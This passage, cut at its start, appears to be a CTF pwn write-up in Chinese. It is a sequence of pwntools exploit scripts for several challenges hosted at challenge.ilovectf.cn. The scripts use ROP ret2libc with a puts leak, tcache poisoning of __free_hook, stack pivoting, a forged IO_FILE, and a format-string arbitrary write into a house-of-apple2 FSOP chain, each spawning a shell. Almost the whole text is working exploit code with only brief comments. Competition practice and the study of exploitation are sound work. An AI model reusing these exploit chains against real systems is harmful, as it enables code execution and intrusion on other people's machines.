idx = 0
if len(target_proc) > 1:
for i, v in enumerate(target_proc):
print(f"{i} => {v}")
idx = int(input(f"Which one:"))
import tempfile
with tempfile.NamedTemporaryFile(prefix = 'cpwn-gdbscript-', delete=False, suffix = '.gdb', mode = 'w') as tmp:
tmp.write(f'shell rm {tmp.name}\n{gs}')
print(tmp.name)
run_in_new_terminal(["sudo", "gdb", "-p", target_proc[idx]['PID'], "-x", tmp.name])
return p
else:
return process(elf.path)
p = start()
ia = lambda : p.interactive()
sla = lambda x,y: p.sendlineafter(x,y)
sa = lambda x,y: p.sendafter(x,y)
ru = lambda x: p.recvuntil(x)
r = lambda x : p.recv(x)
rl = lambda x : p.recvline()[:x]
s = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
itob = lambda x : str(x).encode()
su = lambda x : p.success(x)
u64_ex = lambda x : u64(x.ljust(8,b'\0'))
def cmd(s):
sla("> ",s)
def write(pay):
if(not pay):
return
sa("> ",pay[:8])
write(pay[8:])
# Your exploit here
pop_rdi_ret = 0x4013a5
pop_rbp_ret = 0x40127d
puts_addr = 0x401110
for _ in range(5 + 12 + 1):
cmd(b'1')
for _ in range(5):
cmd(b'1')
read_addr = 0x401462
pay = flat([
b'\0'*0x78,
read_addr,
])
write(pay)
cmd(b"end")
cmd(b"1")
pay = flat([
b'a'*0x68,
pop_rdi_ret,
elf.got["puts"],
puts_addr,
read_addr
])
# pause()
# ru("Plz don't forget again!\n")
# sleep(1)
sa(b"Plz don't forget again!",pay)
rl(-1)
libc_addr = u64_ex(r(6))-0x80e50
bin_sh = libc_addr + 0x1d8678
system = libc_addr + 0x50d70
pay = flat([
b'a'*0x68,
b'a'*0x18,
pop_rdi_ret,
bin_sh,
system
])
pause()
s(pay)
su(hex(libc_addr))
ia()
heap?heap!
简单堆
#!/usr/bin/env python3
'''
author: Yoisaki_Kanade
time: 2025-10-25 10:01:35
'''
from pwncli import *
filename = "code_patched"
libcname = "/home/yoisaki_kanade/.config/cpwn/pkgs/2.31-0ubuntu9.17/amd64/libc6_2.31-0ubuntu9.17_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "challenge.ilovectf.cn"
port = 30677
container_id = ""
proc_name = ""
elf = context.binary = ELF(filename)
if libcname:
libc = ELF(libcname)
gs = '''
b main
b free
set debug-file-directory /home/yoisaki_kanade/.config/cpwn/pkgs/2.31-0ubuntu9.17/amd64/libc6-dbg_2.31-0ubuntu9.17_amd64/usr/lib/debug
set directories /home/yoisaki_kanade/.config/cpwn/pkgs/2.31-0ubuntu9.17/amd64/glibc-source_2.31-0ubuntu9.17_all/usr/src/glibc/glibc-2.31
c
c
'''
context.log_level = 'debug'
context.terminal =['tmux','splitw','-h']
context.arch = 'amd64'
def start():
if args.GDB:
return gdb.debug(elf.path, gdbscript = gs)
elif args.REMOTE:
return remote(host, port)
elif args.DOCKER:
import docker
from os import path
p = remote(host, port)
client = docker.from_env()
container = client.containers.get(container_id=container_id)
processes_info = container.top()
titles = processes_info['Titles']
processes = [dict(zip(titles, proc)) for proc in processes_info['Processes']]
target_proc = []
for proc in processes:
cmd = proc.get('CMD', '')
exe_path = cmd.split()[0] if cmd else ''
exe_name = path.basename(exe_path)
if exe_name == proc_name:
target_proc.append(proc)
idx = 0
if len(target_proc) > 1:
for i, v in enumerate(target_proc):
print(f"{i} => {v}")
idx = int(input(f"Which one:"))
import tempfile
with tempfile.NamedTemporaryFile(prefix = 'cpwn-gdbscript-', delete=False, suffix = '.gdb', mode = 'w') as tmp:
tmp.write(f'shell rm {tmp.name}\n{gs}')
print(tmp.name)
run_in_new_terminal(["sudo", "gdb", "-p", target_proc[idx]['PID'], "-x", tmp.name])
return p
else:
return process(elf.path)
p = start()
ia = lambda : p.interactive()
sla = lambda x,y: p.sendlineafter(x,y)
sa = lambda x,y: p.sendafter(x,y)
ru = lambda x: p.recvuntil(x)
r = lambda x : p.recv(x)
rl = lambda x : p.recvline()[:x]
s = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
itob = lambda x : str(x).encode()
su = lambda x : p.success(x)
u64_ex = lambda x : u64(x.ljust(8,b'\0'))
def cmd(s):
sla(">> ",s)
def insert(i,s,c='\0'):
cmd(b'1')
sla("Index >> ",itob(i))
sla("Size >> ",itob(s))
def erase(i):
cmd(b'2')
sla("Index >> ",itob(i))
def edit(i,c='\0'):
cmd(b'4')
sla("Index >> ",itob(i))
sa("Content >> ",c)
def show(i):
cmd(b'3')
sla("Index >> ",itob(i))
# Your exploit here
insert(1,0x418)
insert(2,0x18)
insert(3,0x18)
insert(4,0x18,)
erase(1)
show(1)
ru("content >> ")
libc_addr = u64_ex(r(6)) - 0x1f1be0 + 0x5000
system = libc_addr + libc.sym["system"]
hook = libc_addr + libc.sym["__free_hook"]
erase(2)
erase(3)
edit(3,p64(hook))
insert(5,0x18)
insert(6,0x18)
edit(6,p64(system))
pause()
edit(4,b"/bin/sh")
erase(4)
su(hex(libc_addr))
su(hex(system))
ia()
key 的大冒险(2)
只溢出到 rsp 可以栈迁移;只溢出到 rbp 可以任意地址写特定数值。
#!/usr/bin/env python3
'''
author: Yoisaki_Kanade
time: 2025-10-25 10:34:11
'''
from pwncli import *
filename = "103300_adventure2"
libcname = "/home/yoisaki_kanade/.config/cpwn/pkgs/2.31-0ubuntu9.18/amd64/libc6_2.31-0ubuntu9.18_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "challenge.ilovectf.cn"
port = 30123
container_id = ""
proc_name = ""
elf = context.binary = ELF(filename)
if libcname:
libc = ELF(libcname)
gs = '''
b main
# b *0x401B02
set debug-file-directory /home/yoisaki_kanade/.config/cpwn/pkgs/2.31-0ubuntu9.18/amd64/libc6-dbg_2.31-0ubuntu9.18_amd64/usr/lib/debug
set directories /home/yoisaki_kanade/.config/cpwn/pkgs/2.31-0ubuntu9.18/amd64/glibc-source_2.31-0ubuntu9.18_all/usr/src/glibc/glibc-2.31
c
c
'''
context.log_level = 'debug'
context.terminal =['tmux','splitw','-h']
context.arch = 'amd64'
def start():
if args.GDB:
return gdb.debug(elf.path, gdbscript = gs)
elif args.REMOTE:
return remote(host, port)
elif args.DOCKER:
import docker
from os import path
p = remote(host, port)
client = docker.from_env()
container = client.containers.get(container_id=container_id)
processes_info = container.top()
titles = processes_info['Titles']
processes = [dict(zip(titles, proc)) for proc in processes_info['Processes']]
target_proc = []
for proc in processes:
cmd = proc.get('CMD', '')
exe_path = cmd.split()[0] if cmd else ''
exe_name = path.basename(exe_path)
if exe_name == proc_name:
target_proc.append(proc)
idx = 0
if len(target_proc) > 1:
for i, v in enumerate(target_proc):
print(f"{i} => {v}")
idx = int(input(f"Which one:"))
import tempfile
with tempfile.NamedTemporaryFile(prefix = 'cpwn-gdbscript-', delete=False, suffix = '.gdb', mode = 'w') as tmp:
tmp.write(f'shell rm {tmp.name}\n{gs}')
print(tmp.name)
run_in_new_terminal(["sudo", "gdb", "-p", target_proc[idx]['PID'], "-x", tmp.name])
return p
else:
return process(elf.path)
p = start()
ia = lambda : p.interactive()
sla = lambda x,y: p.sendlineafter(x,y)
sa = lambda x,y: p.sendafter(x,y)
ru = lambda x: p.recvuntil(x)
r = lambda x : p.recv(x)
rl = lambda x : p.recvline()[:x]
s = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
itob = lambda x : str(x).encode()
su = lambda x : p.success(x)
u64_ex = lambda x : u64(x.ljust(8,b'\0'))
def cmd(s):
sla("Choose an option: ",s)
def buy(i):
cmd(b"4")
sla("Enter the number of the item you want to buy (1-3): \n",itob(i))
def sell(i):
cmd(b'5')
sla("Enter the number of the item you want to sell (1-3): \n",itob(i))
def equip(i):
cmd(b'6')
sla("Enter the number of the item you want to equip (1-3): \n",itob(i))
for _ in range(5):
buy(3)
sell(3)
for _ in range(2):
buy(3)
money = 0x40409C
equip(3)
pay = flat([
b'a'*0x40,
money+0x10
])
sa("You want to say something to the village chief: \n",pay)
ru("Choose an option: Invalid option. Please try again.\n")
ru("Choose an option: Invalid option. Please try again.\n")
for _ in range(0x19):
buy(3)
pay = flat([
b'a'*0x40,
money+0x10,
0x401533
])
equip(3)
sa("You want to say something to the village chief: \n",pay)
ia()
magic
fileno = 0 会从标准输入读,而输入的数据又会先拷贝到缓冲区。
#!/usr/bin/env python3
'''
author: Yoisaki_Kanade
time: 2025-10-28 15:59:30
'''
from pwncli import *
filename = "154333_io"
libcname = "/home/yoisaki_kanade/.config/cpwn/pkgs/2.39-0ubuntu8.5/amd64/libc6_2.39-0ubuntu8.5_amd64/usr/lib/x86_64-linux-gnu/libc.so.6"
host = "challenge.ilovectf.cn"
port = 30180
container_id = ""
proc_name = ""
elf = context.binary = ELF(filename)
if libcname:
libc = ELF(libcname)
gs = '''
b main
# b read
# b *0x401825
set debug-file-directory /home/yoisaki_kanade/.config/cpwn/pkgs/2.39-0ubuntu8.5/amd64/libc6-dbg_2.39-0ubuntu8.5_amd64/usr/lib/debug
set directories /home/yoisaki_kanade/.config/cpwn/pkgs/2.39-0ubuntu8.5/amd64/glibc-source_2.39-0ubuntu8.5_all/usr/src/glibc/glibc-2.39
c
c
'''
context.log_level = 'debug'
context.terminal =['tmux','splitw','-h']
context.arch = 'amd64'
def start():
if args.GDB:
return gdb.debug(elf.path, gdbscript = gs)
elif args.REMOTE:
return remote(host, port)
elif args.DOCKER:
import docker
from os import path
p = remote(host, port)
client = docker.from_env()
container = client.containers.get(container_id=container_id)
processes_info = container.top()
titles = processes_info['Titles']
processes = [dict(zip(titles, proc)) for proc in processes_info['Processes']]
target_proc = []
for proc in processes:
cmd = proc.get('CMD', '')
exe_path = cmd.split()[0] if cmd else ''
exe_name = path.basename(exe_path)
if exe_name == proc_name:
target_proc.append(proc)
idx = 0
if len(target_proc) > 1:
for i, v in enumerate(target_proc):
print(f"{i} => {v}")
idx = int(input(f"Which one:"))
import tempfile
with tempfile.NamedTemporaryFile(prefix = 'cpwn-gdbscript-', delete=False, suffix = '.gdb', mode = 'w') as tmp:
tmp.write(f'shell rm {tmp.name}\n{gs}')
print(tmp.name)
run_in_new_terminal(["sudo", "gdb", "-p", target_proc[idx]['PID'], "-x", tmp.name])
return p
else:
return process(elf.path)
# 0x0 _flags
# 0x8 _IO_read_ptr
# 0x10 _IO_read_end
# 0x18 _IO_read_base
# 0x20 _IO_write_base
# 0x28 _IO_write_ptr
# 0x30 _IO_write_end
# 0x38 _IO_buf_base
# 0x40 _IO_buf_end
# 0x48 _IO_save_base
# 0x50 _IO_backup_base
# 0x58 _IO_save_end
# 0x60 _markers
# 0x68 _chain
# 0x70 _fileno
# 0x74 _flags2
# 0x78 _old_offset
# 0x80 _cur_column
# 0x82 _vtable_offset
# 0x83 _shortbuf
# 0x88 _lock
# //IO_FILE_complete
# 0x90 _offset
# 0x98 _codecvt
# 0xa0 _wide_data
# 0xa8 _freeres_list
# 0xb0 _freeres_buf
# 0xb8 __pad5
# 0xc0 _mode
# 0xc4 _unused2
# 0xd8 vtable
magic = 0x4C72F0
deadbeaf = 0x40188b
_IO_file_jumps = 0x4c6fa0
f = IO_FILE_plus_struct()
f.fileno = 0
f.flags = 0xfbad0000
f._IO_read_base = magic
f._IO_read_ptr = f._IO_read_end = magic + 0x21
f._IO_buf_base = magic
f._IO_buf_end = magic + 0x21
f._wide_data = 0x4c5600
f._offset = 0xffffffffffffffff
f._lock = 0x4ce860
f.vtable = _IO_file_jumps
f.chain = 0x4c5160
p = start()
ia = lambda : p.interactive()
sla = lambda x,y: p.sendlineafter(x,y)
sa = lambda x,y: p.sendafter(x,y)
ru = lambda x: p.recvuntil(x)
r = lambda x : p.recv(x)
rl = lambda x : p.recvline()[:x]
s = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
itob = lambda x : str(x).encode()
su = lambda x : p.success(x)
u64_ex = lambda x : u64(x.ljust(8,b'\0'))
sa("> ",bytes(f)[:0x78])
sa("And then...",p32(0xDEADBEAF)*8)
ia()
short or out
house of apple2。
#!/usr/bin/env python3
'''
author: Yoisaki_Kanade
time: 2025-10-28 19:07:28
'''
from pwncli import *
filename = "pwn_patched"
libcname = "/home/yoisaki_kanade/.config/cpwn/pkgs/2.31-0ubuntu9.17/amd64/libc6_2.31-0ubuntu9.17_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "challenge.ilovectf.cn"
port = 30192
container_id = ""
proc_name = ""
elf = context.binary = ELF(filename)
if libcname:
libc = ELF(libcname)
gs = '''
b main
# b *(0x12FF + 0x555555554000)
# b free
set debug-file-directory /home/yoisaki_kanade/.config/cpwn/pkgs/2.31-0ubuntu9.17/amd64/libc6-dbg_2.31-0ubuntu9.17_amd64/usr/lib/debug
set directories /home/yoisaki_kanade/.config/cpwn/pkgs/2.31-0ubuntu9.17/amd64/glibc-source_2.31-0ubuntu9.17_all/usr/src/glibc/glibc-2.31
c
c
'''
context.log_level = 'debug'
context.terminal =['tmux','splitw','-h']
context.arch = 'amd64'
def start():
if args.GDB:
return gdb.debug(elf.path, gdbscript = gs)
elif args.REMOTE:
return remote(host, port)
elif args.DOCKER:
import docker
from os import path
p = remote(host, port)
client = docker.from_env()
container = client.containers.get(container_id=container_id)
processes_info = container.top()
titles = processes_info['Titles']
processes = [dict(zip(titles, proc)) for proc in processes_info['Processes']]
target_proc = []
for proc in processes:
cmd = proc.get('CMD', '')
exe_path = cmd.split()[0] if cmd else ''
exe_name = path.basename(exe_path)
if exe_name == proc_name:
target_proc.append(proc)
idx = 0
if len(target_proc) > 1:
for i, v in enumerate(target_proc):
print(f"{i} => {v}")
idx = int(input(f"Which one:"))
import tempfile
with tempfile.NamedTemporaryFile(prefix = 'cpwn-gdbscript-', delete=False, suffix = '.gdb', mode = 'w') as tmp:
tmp.write(f'shell rm {tmp.name}\n{gs}')
print(tmp.name)
run_in_new_terminal(["sudo", "gdb", "-p", target_proc[idx]['PID'], "-x", tmp.name])
return p
else:
return process(elf.path)
p = start()
ia = lambda : p.interactive()
sla = lambda x,y: p.sendlineafter(x,y)
sa = lambda x,y: p.sendafter(x,y)
ru = lambda x: p.recvuntil(x)
r = lambda x : p.recv(x)
rl = lambda x : p.recvline()[:x]
s = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
itob = lambda x : str(x).encode()
su = lambda x : p.success(x)
u64_ex = lambda x : u64(x.ljust(8,b'\0'))
def send_(pay):
sla("length: \n",itob(32))
sa("content: \n",pay[:0x20])
# pay = b"%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p"
pay = b"%1$p%3$p%51$p"
# 8 is you input
send_(pay)
stack_addr = int(r(14).decode(),16)
libc_addr = int(r(14).decode(),16) - 0x1131f2 + 0x5000
main_addr = int(r(14).decode(),16) - 0x122f
bss_addr = main_addr + 0x4020 + 0x100
target = stack_addr + 0x138
one_gad = 0xe3afe + libc_addr
def write(addr,data,cnt=8):
if(cnt == 0):
return
str_data = str(data & 0xff).encode()
if data != 0:
pay = (b"%" + str_data + b"c%11$hhn").ljust(0x18,b'\0') + p64(addr)
else:
pay = (b"%11$hhn").ljust(0x18,b'\0') + p64(addr)
send_(pay)
write(addr+1,data>>8,cnt = cnt-1)
def super_write(addr,pay):
if(not pay):
return addr
write(addr,u64(pay[:8]))
super_write(addr+0x8,pay[8:])
f = IO_FILE_plus_struct()
f.vtable = libc_addr + 0x1e8f60
f._wide_data = bss_addr + 0x100
f._IO_write_ptr = 0x2
f._IO_write_base = 0x1
f._mode = 0xffffffff
super_write(bss_addr,(p32(0xfffff7f5)+ b";sh\x00").ljust(0x10,b'\0') + bytes(f)[0x10:])
C = b'\x00'*0x68 + p64(libc_addr+ libc.sym["system"])
B = (b'\x00'*0x20+b'\x01').ljust(0xe0,b'\0') +p64(bss_addr + 0x200)
super_write(bss_addr+0x100,B)
super_write(bss_addr+0x200,C)
write(libc_addr + 0x1ed5a0,bss_addr)
sleep(3)
sl(b"19260817")
su(hex(stack_addr))
su(hex(libc_addr))
su(hex(main_addr))
ia()